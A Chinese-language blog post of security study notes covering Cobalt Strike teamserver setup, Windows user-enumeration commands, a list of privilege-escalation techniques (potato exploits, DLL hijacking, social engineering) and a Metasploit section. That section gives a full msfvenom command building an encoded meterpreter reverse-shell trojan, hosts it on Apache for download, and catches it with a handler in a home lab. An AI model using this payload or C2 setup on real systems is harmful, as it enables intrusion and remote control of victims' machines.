Day9(网络安全)

目录

安装CS

用户组和用户、windows信息搜集命令

手工提权思路,土豆提权

土豆提权

思路

CS插件提权

MSF提权


安装CS

将CS文件解压过后,将文件中的server文件夹上传到VPS。

之后进入VPS,对其中的teamserver和TeamServerImage进行权限设置

对应命令chmod +x teamserver       chmod +x TeamServerImage

之后可以进行服务端设置其格式为:”./teamserver  your.ip  your.password”

之后可以切到本机,或虚拟机中,开启CS文件中的client文件。打开里面的CS的vbs文件,之后进入连接画面

输入我们之前设置好的ip和password,点击连接即可。

用户组和用户、windows信息搜集命令

Windows系统中,用户组和用户信息的搜集可以通过多种命令实现。以下是一些常用的命令及其功能总结:

一.查看所有用户:

        命令: net user

        功能: 列出系统中所有用户账户。

二.查看用户详细信息:

        命令: net user [用户名]

        功能: 显示指定用户的详细信息,包括全名、组成员身份、密码信息等。

三.查看所有用户组:

        命令: net localgroup

        功能: 列出系统中所有本地用户组。

四.查看用户组详细信息:

        命令: net localgroup [组名]

        功能: 显示指定用户组的详细信息,包括组成员。

五.查看计算机信息:

        命令: systeminfo

        功能: 显示计算机的详细配置信息,包括操作系统版本、内存、网络适配器等。

六.查看当前登录用户:

        命令: whoami

        功能: 显示当前登录用户的用户名。

七.查看用户登录历史:

        命令: net user [用户名] | find "Last logon"

        功能: 显示指定用户的最后登录时间。

手工提权思路,土豆提权

          

土豆提权

从网站上获取土豆家族的exe文件,有可能一次,两次会失败,可使用其他的土豆进行提权。

思路

手工提权(Privilege Escalation)是指攻击者通过各种手段提升其在系统中的权限,以获得更高的控制权。以下是一些常见的手工提权思路:

一.用户和组权限审计:

        检查当前用户的权限和所属用户组,寻找具有更高权限的组(如管理员组)并尝试加入。

二.弱密码和凭证:

        尝试使用常见的弱密码进行登录,或查找存储在文件中的凭证(如配置文件、脚本等)。

三.服务和计划任务:

        检查系统中运行的服务和计划任务,寻找以高权限运行的服务,尝试利用其配置错误或漏洞。

四.文件和目录权限:

        审计文件和目录的权限,寻找可写的系统文件(如 /etc/passwd  Windows 系统目录下的文件),尝试替换或修改。

五.漏洞利用:

        查找系统和应用程序的已知漏洞,利用这些漏洞进行提权。

六.环境变量和配置文件:

        检查环境变量和配置文件,寻找可能的敏感信息或错误配置。

七.DLL劫持:

        利用DLL劫持技术,在高权限应用程序中注入恶意DLL

八.内核漏洞:

        如果有访问权限,可以尝试利用内核漏洞进行提权。

九.社交工程:

        通过社交工程手段获取管理员的凭证或权限。

十.利用第三方软件:

        检查系统中安装的第三方软件,寻找可能的提权漏洞。

CS插件提权

进入CS,点击左上角的CS,其中有脚本控制器(scripts),在这个模块中可以添加一些有用的插件或脚本,这些东西需自己下载,随后可以使用这些工具对其目标进行提权操作。

MSF提权

在这里我并没有直接将生成文件交付给目标,而是通过将文件移至apache服务目录中,使目标访问地址进行下载。

通过指令,生成一个木马文件

msfvenom -a x86 --platform windows -p windows/meterpreter/reverse_tcp LHOST=*  LPORT=*   -b "\x00" -e x86/shikata_ga_nai -f exe -o wang.exe

复制wang.exe木马文件到apache访问页,在kali linux上启动apache

root@wangzhike:~# cp wang.exe /var/www/html/
root@wangzhike:~# service apache2 start
root@wangzhike:~# service postgresql start
 

改名/var/www/html/目录中其他的测试页,避免访问出现其他画面

root@wangzhike:~# cd /var/www/html/
root@wangzhike:/var/www/html# ls
index.html  index.nginx-debian.html  wang.exe
root@wangzhike:/var/www/html# mv index.html index.html.bak
root@wangzhike:/var/www/html# mv index.nginx-debian.html index.nginx-debian.html.bak
 

本机访问你的虚拟机的ip

之后下载木马

利用exploit/multi/handler模块攻击

之后本机点击木马,虚拟机上显示监听,之后可进行提权操作。

评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值